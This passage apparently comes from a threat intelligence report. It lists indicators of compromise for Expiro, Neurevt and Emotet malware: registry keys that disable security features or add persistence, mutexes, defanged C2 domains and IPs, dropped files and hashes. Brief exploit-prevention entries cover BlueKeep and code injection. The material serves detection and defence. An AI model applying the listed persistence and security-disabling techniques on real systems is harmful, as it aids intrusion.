%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\expand.exe1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\AdapterTroubleshooter.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\AdapterTroubleshooter.exe1
%System32%\Tasks\autoconv1
*See JSON for more IOCs

File Hashes

151143935c4283f66a837eca1761400ab0573929e04217a5be0286b28eeb9d15 1736c692db984e5ceb7e15a127f2478400a78c30785fd3c195ae4d9468b80259 185f85a2fbc3e27f87b099ff50a1f03f89e724e7927ec9edac4c4416dc87c109 1da732e9670f73e980723ea167abb29c5b553603c3804ec4bb9a03a4d506e8a4 3a6ca5a46ac5ac3ef7972b22e2fa5cdc4af2e137150691ed1b7a15b1ce9030a4 3c7e1a50d31138b53165e98d7bc2ba570304359bb4f7baab7ded17cc3fb3bc4c 4574e5aeda39aadfadb399654d2a6db00884be85b0882fb0acc4dbf14153ca0e 4e242ff308fc31ada637861fed73373c30eb2d5ecfda92760498fcbe30a9bb07 503baff89f763142c5b49a527972c7119be3f95fcc8cc2a1cde8bb71fd76cd02 561caadf62f59ee8dfd6d9c97e5692875458c55b3e2d53ba43e9496c40ee0824 5dbfa76bd1edb0ae7a516a08c760e2234506d64ae7c905f8e0e8830d74ef8613 65afc018d8cdcc9ec4756e98000265e3ecc3e394b7e5d493dfd6d106cc15118a 6971a5b1aa7e57abad2939f4be1a92651ea7ac12251b804ae17f2ecb1e1bf200 70b5c51e692dcd2f432c05170f7f823fdfd5b6857267117a92fe9d358a7026ed 84a45eec021015ee2eeb5acb7251f3c50c626b41bf47b8fce7c822253e175c64 999a1e5659ac864771ad420c7cad50de5b5118adb5abb80ffe18ad28c932f5a0 a51de392aae3ade74991dd86b1d205c2cc5ecb0752cac2a02c95d61ff14a558c a80ace30082b76edb75d6c9a4f9165af721a8f8b13ac0862bc438589e0af01bd a8fe11512ba3e48b178ad9ef994f48ec581394e69cbdb808f15c1432a762c636 b1e46c28ddff91c0d586933b500ce29bcf83fc094864c4227b6e70fa1981f064 b7cf83e8596736ced202a1de5e67fbaa5bdf9074697d548fdd83800802732ec4 b8c85a34ed5ccfe058c8ba65606add1efdcfe694d0f32e6b91e4b977da1392a8 bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85 cc1efac0bf7786ea4bbd4963d78aee4498e034dd778adce6977eca3d78666483 d3080983742d3deacdbc53a43b1482cfe1573ec8d957fba0f456a676dca3bd90

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Virus.Expiro-7192043-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Type
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
8
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Type
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
1
MutexesOccurrences
SetupLauncher12
Global\<random guid>11
gazavat-svc8
kkq-vx_mtx<number, matching [0-9]{1,2}>8
{7930D12C-1D38-EB63-89CF-4C8161B79ED4}5
{79345B6A-421F-2958-EA08-07396ADB9E27}5
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]10[.]1105
87[.]106[.]190[.]1534
18[.]213[.]250[.]1172
91[.]195[.]240[.]1262
208[.]100[.]26[.]2511
18[.]215[.]128[.]1431
46[.]165[.]220[.]1451
46[.]165[.]254[.]1981
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
atw82ye63ymdp[.]com3
xxsmtenwak[.]com3
grbjgfprk[.]com3
ydchosmhwljjrq[.]com3
ygqqaluei[.]com3
wwyreaohjbdyrajxif[.]com3
bekvfkxfh[.]com3
caosusubld[.]com3
warylmiwgo[.]com3
xomeommdilsq[.]com3
mdofetubarhorbvauf[.]com3
gfaronvw[.]com1
wstujheiancyv[.]com1
kbivgyaakcntdet[.]com1
dvwtcefqgfnixlrdb[.]com1
yrkbpnnlxrxrbpett[.]com1
oawvuycoy[.]com1
citnngljfbhbqtlqlrn[.]com1
bungetragecomedy9238[.]com1
oeuwldhkrnvxg[.]com1
kbodfwsbgfmoneuoj[.]com1
wdgqvaya[.]com1
ypwosgnjytynbqin[.]com1
jlaabpmergjoflssyg[.]com1
ausprcogpngdpkaf[.]com1
*See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe8
%System32%\alg.exe8
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log8
%SystemRoot%\SysWOW64\svchost.exe8
%System32%\<random, matching '[a-z]{8}'>.tmp8
%SystemRoot%\microsoft.net\framework\v2.0.50727\<random, matching '[a-z]{8}'>.tmp8
%LOCALAPPDATA%\bolpidti\judcsgdy.exe5
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe5
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock5
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat5
%LOCALAPPDATA%\bolpidti4
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe3
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log3
\TEMP\ShMnr233
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe1
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe1
%SystemRoot%\SysWOW64\cjnnhbik.tmp1
%SystemRoot%\SysWOW64\hmdklpnd.tmp1
%SystemRoot%\SysWOW64\ghnjiafh.tmp1
%SystemRoot%\SysWOW64\nojnfemc.tmp1
\TEMP\emf1
\TEMP\J3OHIb31
%SystemRoot%\SysWOW64\ggaiaabg.tmp1
%SystemRoot%\SysWOW64\elmmpkjb.tmp1
%SystemRoot%\microsoft.net\framework64\v2.0.50727\jjicllfe.tmp1
*See JSON for more IOCs

File Hashes

08c199483a9569dbe74565c65ab0dfe038338ffe0c37061316a3a45116a9adb0 0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b 293263135eb196a8027f6aea0f74038d60b848103f09db6d39e55b763d6bf26a 29ec1dfc85cfed46ccf8a53ca2e9f207cb126f6cec92a3b829ae61590bea1b1c 32ed07783188242c60837a208a6ebab9e37fa69fb69da9b28629c3e3971ccfa6 36e5bd8e4a5c7758dd28acda1ad479bfbfb268ca1c5339b4e9953daea48392ac 63530b594d1605211d405951823a3f5ac249660aa0ca542cb00247652dc3b544 664bd013762c59a6f0b0c8fbd7dbed06f971d2dfbc2921e10faf8b5e8aba2e8a c075f037fea0578197e56a520708152779a9332195b96a52bac64ff10a914d82 d28f2744b436cb2816ee6a63a44e2cfd4f952483b65c026ea8b4f384cc6b7e5e ea5a419cb19fc22c11d3751f0560f049631571b99c33d37482ddbca1ee4e3d6f f2fffb85b3e49c138128ef141b69a49fd09e3c7362ed8beed43dc6c46deadbcb f5fec4cf85c3e2c936455b0f0ec8a6cbbb138dfa5e31db4920037f9baf46ab65

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Malware.Neurevt-7192122-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\WIN7ZIP
Value Name: Uuid
26
<HKCU>\SOFTWARE\WIN7ZIP 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\PUBLICPROFILE
Value Name: EnableFirewall
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SSDPSRV
Value Name: Start
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRUI.EXE 9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRUI.EXE
Value Name: Debugger
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: random
2
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\10DF0332\CG1
Value Name: GLA
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OMYLCQKSW.EXE
Value Name: Debugger
1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CS1 1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CW1 1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CW1
Value Name: 1916
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Javaupdate
1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\6EDA084A\CG1
Value Name: GLA
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\BZSBKOTIU.EXE
Value Name: Debugger
1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726 1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726\CS1 1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726\CW1 1
<HKCR>\CLSID\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\5BDD0726\CG1 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]2509
52[.]185[.]71[.]285
208[.]100[.]26[.]2511
40[.]76[.]4[.]151
20[.]41[.]46[.]1451
40[.]67[.]189[.]141
94[.]130[.]148[.]391
176[.]56[.]236[.]1801
143[.]215[.]215[.]2051
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
update-silo[.]com1
frizzcams[.]com1
fapncam[.]com1
theafam[.]info1
pl1[.]co[.]vu1
kasn5[.]name1
up-windows[.]in1
myssfii[.]eu1
emicrosoft[.]eu1
allegro[.]ga1
frky7[.]name1
marklou1[.]eu1
s1allegro[.]net1
b[.]dqwjnewkwefewaaaaa3[.]com1
fe298c697c247af42926ae65f504cbab[.]380d71f68b776c687229362c8017cfd4[.]sink1[.]doombringer[.]pw1
b[.]2uandmearevideos2k2[.]com1
e4afed3b6057875d3cab2c8acadf19b0[.]9079efdb6bd50d249cecbf60d0cf8a59[.]sink1[.]doombringer[.]pw1
b[.]12thegamejuststarted10k12[.]com1
9f1338aaa955b14adce82b28456563dd[.]8e38e1a12b675dd8ad0879ac9df9dd43[.]sink1[.]doombringer[.]pw1
0a3871225132117b6a5a3ca80e3637e7[.]bd822b74f0f09fe15387a4e573dfd4b8[.]sink1[.]doombringer[.]pw1
5fa5dd9e6db7852950c1d75652840205[.]d30bfb82739133ccfd1a869f816afd1e[.]sink1[.]doombringer[.]pw1
a289b7027c3a8ccd97e35492ec62c4a7[.]79c70407c7e6ecfca660191065cb2e91[.]sink1[.]doombringer[.]pw1
82ffe6077d09c53372a2f4177b3a00fd[.]2418805ba4dbdf2b323c3ee2d28fd899[.]sink1[.]doombringer[.]pw1
b[.]6worldwipemek6[.]com1
ce5ccbd7434dc4f3e00d5d615c8f1cfe[.]f919bc55f255fc49078e2b0e54e60b5e[.]sink1[.]doombringer[.]pw1
*See JSON for more IOCs
Files and or directories createdOccurrences
%HOMEPATH%\My Documents\My Videos\Desktop.ini18
%System32%\Tasks\Windows Update Check - 0x0000000017
%ProgramData%\riaiccape3
%ProgramData%\riaiccape\desktop.ini3
%ProgramData%\ubvhynpxh2
%ProgramData%\ubvhynpxh\desktop.ini2
%ProgramData%\hemxccape2
%ProgramData%\hemxccape\desktop.ini2
%ProgramData%\randomfolder\desktop.ini2
%ProgramData%\rpeulaaql\desktop.ini1
%ProgramData%\odoaztybt\desktop.ini1
%ProgramData%\mwvaztybt\desktop.ini1
%ProgramData%\safpdndnn\desktop.ini1
%ProgramData%\Javaupdate\desktop.ini1
%System32%\Tasks\Windows Update Check - 0x6EDA084A1
%ProgramData%\dtdasndku\desktop.ini1
%ProgramData%\Winrar_Update\desktop.ini1
%System32%\Tasks\Windows Update Check - 0x6E3308B11
%ProgramData%\omylcqksw\desktop.ini1
%System32%\Tasks\Windows Update Check - 0x5FF907D61
%ProgramData%\svchost\desktop.ini1
%System32%\Tasks\Windows Update Check - 0x19CF045A1
%System32%\Tasks\Windows Update Check - 0x0E7302EC1
%ProgramData%\skskjbpjx\desktop.ini1

File Hashes

00922eea9dc5d3b1d91cf0e5b244d86957e0a5dab9f22b37db91983d154849f5 00e830529982d3b12b63616473f8e77b1e9f59d26d7464a916ab4ccb7d252338 0f9b382f50574eb1da03ab59cc0138d0cdddbcccdbf4fb04377235377e2bce60 19a17d03eaa9d66aee48704b368513cb4ce2ea571004561046897e5fe194fcb5 1d5a814d7034b2ffc16acb036e10021410d1592b491fd4e3c6737ffa48c19f55 205a780668f504064a7a326217529d3dd585fefe2c91b9ee141aa0c0411c88d6 2252337eb1ee8bfcdc05cdd90533c4f9c73326c3c38438730feffb47a67dde13 228cdf170c3b7f8c4b08f89def8b979c147aada601d7e1d0708916a3101732fc 23b79c36c6c5b9b35e11159486bf8f1e0a2366af780c9508bfee93de63fdeb86 2b55f40e873b564258185612ea6518761ab9393f271d1acd3908d65dda91c3f2 2d6b0b02396b515544d508ace60ef5de186961843c6fda12c311716c63b631b4 47fce8ed6989d5946ef8b4a10898d103ded7ffe6d5046d1583aefa21218cbe49 48b4df7d8192fb653ca5d4ef80903794b6cf7baa25bca70624acbcafd1c5f4e1 514e41ef73aa0e6b581168304fc5e4c11a81706d4a00e8dadd8c5e604493e85f 5822b7304c297b694c9826e07c653d1a5071af711f24abf374213dbf73df99d8 69808dfac8e39bb71644ca5b9a354c8407d713e723c49a2bb54ba6a6f54e52d3 699b83596749933b26e4a8cd79df7e961859dce598a28b0a09a7d1a6ef051ba5 714042e00adf37f5772ade261d283e66bfd787ba4622ff188ec9befc05817bcb 82fd5b23902d7114095c356c9820e65b89d7c4dd5da1312e262373608e536e4e 8f0ab0d5a8d06ffb54e69dec00c3d2e920794be65cb3b9f316a04af9c3d3ed35 96e0342a3295906bf604f8fcffb8845e3d4a72ceb8ca34443f54216616467ddc 97f3a82738d8dc6703828c406ecafd16acbc019bf8c810516912302ec1d2b553 a925cb47ff812a85faee0d1a39c2f16ac6b99dff405d01741fc253ec76cf29aa ac2c823fe5be07bc030e77510922ec076642c5ef5966b0ec56b6dfefcba06e34 aee901442f82ad32986e1c36969d48d76d4cc88bb8b084d0a2749220a86a26b5
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Doc.Dropper.Emotet-7181950-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS\OPENWITHPROGIDS
Value Name: JSFile
38
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS 38
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS\OPENWITHPROGIDS 38
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.JS\OPENWITHLIST 38
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER
Value Name: Name
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER
Value Name: Path
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER
Value Name: Extensions
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS
Value Name: Name
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS
Value Name: Path
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS
Value Name: Extensions
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X
Value Name: Name
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X
Value Name: Path
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X
Value Name: Extensions
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS
Value Name: ErrorControl
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS
Value Name: ImagePath
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS
Value Name: DisplayName
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS
Value Name: WOW64
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YELLOWREPORTS
Value Name: ObjectName
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS 37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT 37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\RECOVER 37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WRDPRFCTDOS 37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\OFFICE\14.0\WORD\TEXT CONVERTERS\IMPORT\WORDPERFECT6X 37
MutexesOccurrences
Global\I98B68E3C37
Global\M98B68E3C37
Global\M3C28B0E419
Global\I3C28B0E419
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
181[.]123[.]0[.]12515
18[.]217[.]99[.]16415
119[.]159[.]150[.]17613
80[.]240[.]141[.]14113
184[.]69[.]214[.]9413
186[.]75[.]241[.]23011
124[.]240[.]198[.]6611
209[.]182[.]195[.]229
173[.]194[.]68[.]108/318
69[.]43[.]168[.]2328
104[.]31[.]71[.]1828
110[.]36[.]234[.]1468
197[.]211[.]244[.]68
125[.]99[.]61[.]1628
115[.]88[.]70[.]2268
207[.]204[.]50[.]447
217[.]116[.]0[.]2287
162[.]251[.]80[.]266
104[.]31[.]70[.]1826
72[.]167[.]238[.]295
74[.]208[.]5[.]155
196[.]25[.]211[.]1505
17[.]36[.]205[.]745
217[.]116[.]0[.]2375
148[.]72[.]198[.]2475
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
themodifiedzone[.]com15
www[.]pics4game[.]com14
www[.]creativespad[.]com9
smtpout[.]secureserver[.]net8
smtp[.]secureserver[.]net7
mail[.]secureserver[.]net6
mail[.]apnabazar[.]co[.]in6
smtp[.]1and1[.]es5
smtp[.]mail[.]com5
pop[.]secureserver[.]net5
secure[.]emailsrvr[.]com5
mail[.]heraldsopenaccess[.]com5
mail[.]heraldsopenaccess[.]us5
smtp[.]mail[.]me[.]com4
pop3[.]telkomsa[.]net4
smtp[.]telkomsa[.]net4
outlook[.]office365[.]com4
smtp[.]orange[.]fr4
remote[.]jubileelife[.]com4
mail[.]keycargroup[.]es4
server[.]isnstores[.]com4
mail[.]r10networks[.]com4
smtp-mail[.]outlook[.]com3
smtp[.]comcast[.]net3
mail[.]rediffmailpro[.]com3
*See JSON for more IOCs
Files and or directories createdOccurrences
%LOCALAPPDATA%\Microsoft\Schemas\MS Word_restart.xml38
%TEMP%\0.7055475.js38
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp38
%System32%\adjustmove.exe (copy)19
%SystemRoot%\SysWOW64\yellowreportsb.exe5
%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe4
%TEMP%\inq6vpuc4.exe1
%TEMP%\llh1np4ba.exe1
%TEMP%\x5ra7abr9.exe1
%TEMP%\tlcebiev2.exe1
%TEMP%\qy2w0i9c1.exe1
%TEMP%\jrtj6nk6o.exe1
%TEMP%\fe2zt4mrb.exe1
%TEMP%\zmmkb0j7x.exe1
%TEMP%\ns8q8axim.exe1
%TEMP%\s1ucq6p8d.exe1
%TEMP%\fxmnkq4qt.exe1
%TEMP%\4l4u8k8s6.exe1
%TEMP%\lvn7pj1tq.exe1
%TEMP%\qz03ja0fx.exe1
%TEMP%\o2a6n5yed.exe1
%TEMP%\h04mv88ph.exe1
%TEMP%\9m0sfw639.exe1
%TEMP%\waymo412t.exe1
%TEMP%\9611f6amr.exe1
*See JSON for more IOCs

File Hashes

04506f92dbebbdad34850d0344014c9acf170a1f532660d18512975d62756fbd 16a9929e17b9fcc99f8d2eb5ec86b365239b0f957b187594f77319540ce5e5f1 1b5fd4653bdbb88ef0615c3a4b38e642630fddfd738ceafb893b6c860beb117a 1be7caaba5194edf4387892d03521e968be5fa4b784a833b0c6321285694a660 1cfe976389fe9d737b7419de0fac59fa4dce4e78c73714124b1689011e3ce732 1f8d4a7a30a8f819c87095b98c10328764b56a877915105815442f4192804571 26706d48f23fdb7c40aca350271921e8050870ce4f6d957d94ad308dd3f409a2 298762d4a2ff39b2de5427c13ff95e75a4f4ac07b5f64c46d82ee1043fc52ed8 2b05fd27faf1cc06b2db7e25b67e19ce5ff5c7852e61bf122eaae92345b54a77 2e8ec9034066e25159978c9c8429e0b2762a2e193a48a0d14fe5a45518c5b5a8 3643f64d1633ebca53e1f94f6aba030cc495b68942b532afae9c74f8016d631f 4331d5382007c68ac994c5a45e86985d8fcde1fb478aa69b394a19058d807f67 471ebd4880bf8cfee1920152ea36f170cf9331f37e45bf52f5b9bcfcbd326ffb 4781987ed5962518144b03612044b8dea7e5a29107a2ad2f7a2c0738313586ee 4e2f28c6260342e1d56264f6cb861d81987fff70905700660034a240c59d75d9 4ebd8502f68223342be072867f79338fb13dfe6b68b209bfdb27f5effef40d05 5fae5b96569a4759bd5cc6494b24edef1639bcc28ed105bc3eb8f9fa09bca4c9 7362434686fb62fe3ce77a4ea84886f0f82768112b6f9832cc86bbdfc83bdef9 7c067959175e72df745b86f91dd1fa402f4b3b3c0ad17ca70b77a1f6185a285c 7d06e0759eafca0709823dadb15c5d37c7a3cada38bad9bcb4ca678d3895bfb0 807cfe5cb5d6075af492a911fd096b0a3705f9fe7cd0a7263d94e4efa21a50f4 857f05b3df88059eeeaecea4da6901ad6e45e5cbb9be21d1ae7d17b946cba355 86c47685c49f4d0cec1c54b0b6cc8247ebd8c17b01a63da2ac19c0b02d426ebd 89763a9eefa6606d925392aa2718facb16958916ee2564025edcd1d74712536b a0703d7150ce06752f04e53ea2ad6f102551e1bdb8588fdc2e6bf90668e1de7e
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Malware




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (12639)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Excessively long PowerShell command detected - (5242)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Madshi injection detected - (2444)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected - (933)
